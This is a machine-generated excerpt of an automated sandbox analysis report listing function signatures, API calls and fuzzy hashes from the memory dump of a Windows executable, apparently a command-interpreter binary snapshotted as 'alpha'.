                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                       • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: memset$CurrentDirectorytowupper
                                      • String ID:
                                      • API String ID: 1403193329-0
                                      • Opcode ID: 9eadb3359a7035c4c8b06301bcad4ec111c2959e7ad062144f1a1f931ae642b1
                                      • Instruction ID: 95bb95beaa5fde619c6277341a141b566359422610704f7667b5b28008bca925
                                      • Opcode Fuzzy Hash: 9eadb3359a7035c4c8b06301bcad4ec111c2959e7ad062144f1a1f931ae642b1
                                      • Instruction Fuzzy Hash: 0861B0B7A087828AE760DB65D8402EDB7A4FB44B58FD84535DE9D07B99DF38D840C710
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                       • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: _wcsnicmp$wcschr
                                      • String ID:
                                      • API String ID: 3270668897-0
                                      • Opcode ID: 0c5351208ff2a5a36442746df2c9d56de1180022aab67ae3c28b2a55d3b35da5
                                      • Instruction ID: 592f3169116476d14974cb779ae2d515d0ee9e35b48e0590ab44dd77d8d4f00a
                                      • Opcode Fuzzy Hash: 0c5351208ff2a5a36442746df2c9d56de1180022aab67ae3c28b2a55d3b35da5
                                      • Instruction Fuzzy Hash: 13516F9BE0C68381EB61BF219450179E3A1EF46FA8FDC9131CA5E472D5EE6CED418360
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                       • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: memset$DriveFullNamePathType
                                      • String ID:
                                      • API String ID: 3442494845-0
                                      • Opcode ID: 96e94011f7e51b9192f665da575d41fb78cf0bd335fa213fa644a3e80f09fdea
                                      • Instruction ID: d367bd5973a2f53c6551c68c1ac09d19a5f30abdd0370cd242e00376afa54a82
                                      • Opcode Fuzzy Hash: 96e94011f7e51b9192f665da575d41fb78cf0bd335fa213fa644a3e80f09fdea
                                      • Instruction Fuzzy Hash: C2318A77615BC68AEB60DF20E8402E9B7A5FB88F88F884125EA4D47B54CF38D605C710
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                       • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
                                      • String ID:
                                      • API String ID: 140117192-0
                                      • Opcode ID: f9503a7e6f26e693eab0e8ec34dcabcd79a91a5ad0fdcc229cb5dec8ce22a0f7
                                      • Instruction ID: bbd06355632b5148a19a90c0465547b2016858e4700cb4853bc6667297dd71f0
                                      • Opcode Fuzzy Hash: f9503a7e6f26e693eab0e8ec34dcabcd79a91a5ad0fdcc229cb5dec8ce22a0f7
                                      • Instruction Fuzzy Hash: E541AAFAA18B8385EA90AB18F850365B3B4FB88B58FD85135D98D82764DF3DE444C720
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                       • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: wcstol$lstrcmp
                                      • String ID:
                                      • API String ID: 3515581199-0
                                      • Opcode ID: 5b9efed5608bd49f2816daba6a3b85e90b3500fb38e55be3423670eddfbfd6ec
                                      • Instruction ID: 9a77532e0ead7f067111185250422b0908b09b38d17e31c4d63258bc11ad6602
                                      • Opcode Fuzzy Hash: 5b9efed5608bd49f2816daba6a3b85e90b3500fb38e55be3423670eddfbfd6ec
                                      • Instruction Fuzzy Hash: A821D777A0864383F661AB7990A4139EBA0FB49F68FC95134CB4F42654CF6CE9448610
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                       • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: File_get_osfhandle$TimeWrite
                                      • String ID:
                                      • API String ID: 4019809305-0
                                      • Opcode ID: 81587e0329514d19275e074575feb35963da2dd15ba7483d0e323a7e2a39d08e
                                      • Instruction ID: 0db4e410ff503c7ca5a04feee86e6a373e50b7a23d3260766b0f989028ecdf39
                                      • Opcode Fuzzy Hash: 81587e0329514d19275e074575feb35963da2dd15ba7483d0e323a7e2a39d08e
                                      • Instruction Fuzzy Hash: D031A46BA0868386E7A0AB54944033CE690BF49F58F9C6238DA5E47B95CF3CD8448610
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                       • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: memset$DriveNamePathTypeVolume
                                      • String ID:
                                      • API String ID: 1029679093-0
                                      • Opcode ID: d45035a7c6ac09dbba50d0c00beb4f85e1cca4574d2ac4f31282f71e25618f1f
                                      • Instruction ID: a29ddc7179d17f8c05c375e7579880cc26b848e257c3324df7dd7a76cd4194d8
                                      • Opcode Fuzzy Hash: d45035a7c6ac09dbba50d0c00beb4f85e1cca4574d2ac4f31282f71e25618f1f
                                      • Instruction Fuzzy Hash: 9C312977705AC28AEB609F21D8543E8A7A4FB89F88F884135DA4D87B48DF3CD645C750
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                       • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: File$DeleteErrorLastWrite_get_osfhandle
                                      • String ID:
                                      • API String ID: 2448200120-0
                                      • Opcode ID: 8b4da8a10e097a17451e285642832c13025bfbcfcba5fc9726ddc1af043f7f21
                                      • Instruction ID: caeea36fed782348529c9b5b5fe81e9014f452b305577d59e03f0856fbfd8d88
                                      • Opcode Fuzzy Hash: 8b4da8a10e097a17451e285642832c13025bfbcfcba5fc9726ddc1af043f7f21
                                      • Instruction Fuzzy Hash: CD214CBBA0874386E656BB11A40017DF6A1FB86F99F885139E91E47795CF3CE841CB20
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                       • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: Heap$AllocProcess
                                      • String ID:
                                      • API String ID: 1617791916-0
                                      • Opcode ID: 42f91e47f3ef5671c9468e2150952d512ccb49b47a4aa8ec2999c576e9d14cb8
                                      • Instruction ID: d592d9c6575427809955092a3a289cbfbfbd50ea1cff67ffa042d4c5b1886e6d
                                      • Opcode Fuzzy Hash: 42f91e47f3ef5671c9468e2150952d512ccb49b47a4aa8ec2999c576e9d14cb8
                                      • Instruction Fuzzy Hash: 852179AAB08B4385E944AB61A510079F7A1FF49FD4BDD9130DE1E47795DF3CE4418720
                                      APIs
                                        • Part of subcall function 00007FF755CB3C24: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF755CB3D0C
                                        • Part of subcall function 00007FF755CB3C24: towupper.MSVCRT ref: 00007FF755CB3D2F
                                        • Part of subcall function 00007FF755CB3C24: iswalpha.MSVCRT ref: 00007FF755CB3D4F
                                        • Part of subcall function 00007FF755CB3C24: towupper.MSVCRT ref: 00007FF755CB3D75
                                        • Part of subcall function 00007FF755CB3C24: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF755CB3DBF
                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF755CCEA0F,?,?,?,00007FF755CCE925,?,?,?,?,00007FF755CAB9B1), ref: 00007FF755CA6ABF
                                      • RtlFreeHeap.NTDLL ref: 00007FF755CA6AD3
                                        • Part of subcall function 00007FF755CA6B84: SetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,00007FF755CA6AE8,?,?,?,00007FF755CCEA0F,?,?,?,00007FF755CCE925), ref: 00007FF755CA6B8B
                                        • Part of subcall function 00007FF755CA6B84: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,00007FF755CA6AE8,?,?,?,00007FF755CCEA0F,?,?,?,00007FF755CCE925), ref: 00007FF755CA6B97
                                        • Part of subcall function 00007FF755CA6B84: RtlFreeHeap.NTDLL ref: 00007FF755CA6BAF
                                        • Part of subcall function 00007FF755CA6B30: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF755CA6AF1,?,?,?,00007FF755CCEA0F,?,?,?,00007FF755CCE925), ref: 00007FF755CA6B39
                                        • Part of subcall function 00007FF755CA6B30: RtlFreeHeap.NTDLL ref: 00007FF755CA6B4D
                                        • Part of subcall function 00007FF755CA6B30: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF755CA6AF1,?,?,?,00007FF755CCEA0F,?,?,?,00007FF755CCE925), ref: 00007FF755CA6B59
                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF755CCEA0F,?,?,?,00007FF755CCE925,?,?,?,?,00007FF755CAB9B1), ref: 00007FF755CA6B03
                                      • RtlFreeHeap.NTDLL ref: 00007FF755CA6B17
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                       • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: Heap$Process$Free$towupper$CurrentDirectoryEnvironmentFullNamePathStringsiswalpha
                                      • String ID:
                                      • API String ID: 3512109576-0
                                      • Opcode ID: bc717c9a596d532be53730772a57c2b9eba5803a0bc99b3bfc1eed86634cc025
                                      • Instruction ID: e2e29dddf79685a0669c8b00c34458f5275703eb73b4fc790ccc3de5ac654ea5
                                      • Opcode Fuzzy Hash: bc717c9a596d532be53730772a57c2b9eba5803a0bc99b3bfc1eed86634cc025
                                      • Instruction Fuzzy Hash: 94217FABE09A8385EB44AB65D4143B8BBA0EF59F49F9C8035C90E47391DF2CA4859370
                                      APIs
                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF755CAAF82), ref: 00007FF755CAB6D0
                                      • HeapReAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF755CAAF82), ref: 00007FF755CAB6E7
                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF755CAAF82), ref: 00007FF755CAB701
                                      • HeapSize.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF755CAAF82), ref: 00007FF755CAB715
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                       • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: Heap$Process$AllocSize
                                      • String ID:
                                      • API String ID: 2549470565-0
                                      • Opcode ID: 11430d80cb485e7b9ceb592bfe559dc550d55c3bb95ca86021ccd698df5acc4f
                                      • Instruction ID: bb4999945fa7fc23a0d9fae186252f2c1128828b886c1d5c04d2522f79115e69
                                      • Opcode Fuzzy Hash: 11430d80cb485e7b9ceb592bfe559dc550d55c3bb95ca86021ccd698df5acc4f
                                      • Instruction Fuzzy Hash: E42133BBA09A8386EA55AB11E550078FAB1FF49F8CBCC9931DA4E43750DF7CE4418320
                                      APIs
                                      • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF755CB507A), ref: 00007FF755CCD01C
                                      • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF755CB507A), ref: 00007FF755CCD033
                                      • FillConsoleOutputAttribute.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF755CB507A), ref: 00007FF755CCD06D
                                      • SetConsoleTextAttribute.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF755CB507A), ref: 00007FF755CCD07F
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                       • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: Console$Attribute$BufferFillHandleInfoOutputScreenText
                                      • String ID:
                                      • API String ID: 1033415088-0
                                      • Opcode ID: 45059cb2ee047cb232d20320cf03883d9ebc73042b8c9a2b0d276472751f5675
                                      • Instruction ID: 1c1a0d0269ff825f1e553904cfd46d481d6dde52df8df8d22bd7ac413a0ff26b
                                      • Opcode Fuzzy Hash: 45059cb2ee047cb232d20320cf03883d9ebc73042b8c9a2b0d276472751f5675
                                      • Instruction Fuzzy Hash: A0119076618A8286DB449B24F40417AF7E0FB8AF99F885135EA9E47B54DF3CD045CB10
                                      APIs
                                        • Part of subcall function 00007FF755CB1EA0: wcschr.MSVCRT(?,?,?,00007FF755CA286E,00000000,00000000,00000000,00000000,00000000,0000000A,?,00007FF755CD0D54), ref: 00007FF755CB1EB3
                                      • CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF755CA5A2E
                                      • _open_osfhandle.MSVCRT ref: 00007FF755CA5A4F
                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,00000000,00008000,?,00000001,00007FF755CA260D), ref: 00007FF755CC37AA
                                      • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0 ref: 00007FF755CC37D2
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: CloseCreateErrorFileHandleLast_open_osfhandlewcschr
                                      • String ID:
                                      • API String ID: 22757656-0
                                      APIs
                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000028,00007FF755CC5433,?,?,?,00007FF755CC69B8,?,?,?,?,?,00007FF755CB8C39), ref: 00007FF755CC56C5
                                      • RtlFreeHeap.NTDLL ref: 00007FF755CC56D9
                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000028,00007FF755CC5433,?,?,?,00007FF755CC69B8,?,?,?,?,?,00007FF755CB8C39), ref: 00007FF755CC56FD
                                      • RtlFreeHeap.NTDLL ref: 00007FF755CC5711
                                      Similarity
                                      • API ID: Heap$FreeProcess
                                      • String ID:
                                      • API String ID: 3859560861-0
                                      APIs
                                      Similarity
                                      • API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
                                      • String ID:
                                      • API String ID: 140117192-0
                                      APIs
                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF755CA8798), ref: 00007FF755CB4AD6
                                      • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF755CA8798), ref: 00007FF755CB4AEF
                                        • Part of subcall function 00007FF755CB4A14: GetEnvironmentStringsW.KERNELBASE(?,?,00000000,00007FF755CB49F1), ref: 00007FF755CB4A28
                                        • Part of subcall function 00007FF755CB4A14: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF755CB49F1), ref: 00007FF755CB4A66
                                        • Part of subcall function 00007FF755CB4A14: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF755CB49F1), ref: 00007FF755CB4A7D
                                        • Part of subcall function 00007FF755CB4A14: memmove.MSVCRT(?,?,00000000,00007FF755CB49F1), ref: 00007FF755CB4A9A
                                        • Part of subcall function 00007FF755CB4A14: FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF755CB49F1), ref: 00007FF755CB4AA2
                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF755CA8798), ref: 00007FF755CBEE64
                                      • RtlFreeHeap.NTDLL ref: 00007FF755CBEE78
                                      Similarity
                                      • API ID: Heap$Process$AllocEnvironmentFreeStrings$memmove
                                      • String ID:
                                      • API String ID: 2759988882-0
                                      APIs
                                      Similarity
                                      • API ID: ConsoleMode_get_osfhandle
                                      • String ID:
                                      • API String ID: 1606018815-0
                                      APIs
                                        • Part of subcall function 00007FF755CACD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF755CAB9A1,?,?,?,?,00007FF755CAD81A), ref: 00007FF755CACDA6
                                        • Part of subcall function 00007FF755CACD90: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF755CAB9A1,?,?,?,?,00007FF755CAD81A), ref: 00007FF755CACDBD
                                      • wcschr.MSVCRT(?,00000000,00000000,00000000,00000001,0000000A,?,00007FF755CC827A), ref: 00007FF755CD11DC
                                      • memmove.MSVCRT(?,00000000,00000000,00000000,00000001,0000000A,?,00007FF755CC827A), ref: 00007FF755CD1277
                                      Strings
                                      Similarity
                                      • API ID: Heap$AllocProcessmemmovewcschr
                                      • String ID: &()[]{}^=;!%'+,`~
                                      • API String ID: 1135967885-381716982
                                      APIs
                                        • Part of subcall function 00007FF755CB06C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF755CAB4DB), ref: 00007FF755CB06D6
                                        • Part of subcall function 00007FF755CB06C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF755CAB4DB), ref: 00007FF755CB06F0
                                        • Part of subcall function 00007FF755CB06C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF755CAB4DB), ref: 00007FF755CB074D
                                        • Part of subcall function 00007FF755CB06C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF755CAB4DB), ref: 00007FF755CB0762
                                        • Part of subcall function 00007FF755CAEF40: iswspace.MSVCRT(00000000,00000000,?,00000000,?,00007FF755CAE626,?,?,00000000,00007FF755CB1F69), ref: 00007FF755CAF000
                                        • Part of subcall function 00007FF755CAEF40: wcschr.MSVCRT(?,?,00000000,00007FF755CB1F69,?,?,?,?,?,?,?,00007FF755CA286E,00000000,00000000,00000000,00000000), ref: 00007FF755CAF031
                                        • Part of subcall function 00007FF755CAEF40: iswdigit.MSVCRT(?,?,00000000,00007FF755CB1F69,?,?,?,?,?,?,?,00007FF755CA286E,00000000,00000000,00000000,00000000), ref: 00007FF755CAF0D6
                                      • longjmp.MSVCRT ref: 00007FF755CBCCBC
                                      • longjmp.MSVCRT(?,?,00000000,00007FF755CB1F69,?,?,?,?,?,?,?,00007FF755CA286E,00000000,00000000,00000000,00000000), ref: 00007FF755CBCCE0
                                      Strings
                                      Similarity
                                      • API ID: Heap$AllocProcesslongjmp$iswdigitiswspacewcschr
                                      • String ID: GeToken: (%x) '%s'
                                      • API String ID: 3282654869-1994581435
                                      APIs
                                      Strings
                                      Similarity
                                      • API ID: memmovewcsncmp
                                      • String ID: 0123456789
                                      • API String ID: 3879766669-2793719750
                                      APIs
                                      • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF755CC97D0
                                        • Part of subcall function 00007FF755CAD3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF755CAD46E
                                        • Part of subcall function 00007FF755CAD3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF755CAD485
                                        • Part of subcall function 00007FF755CAD3F0: wcschr.MSVCRT ref: 00007FF755CAD4EE
                                        • Part of subcall function 00007FF755CAD3F0: iswspace.MSVCRT ref: 00007FF755CAD54D
                                        • Part of subcall function 00007FF755CAD3F0: wcschr.MSVCRT ref: 00007FF755CAD569
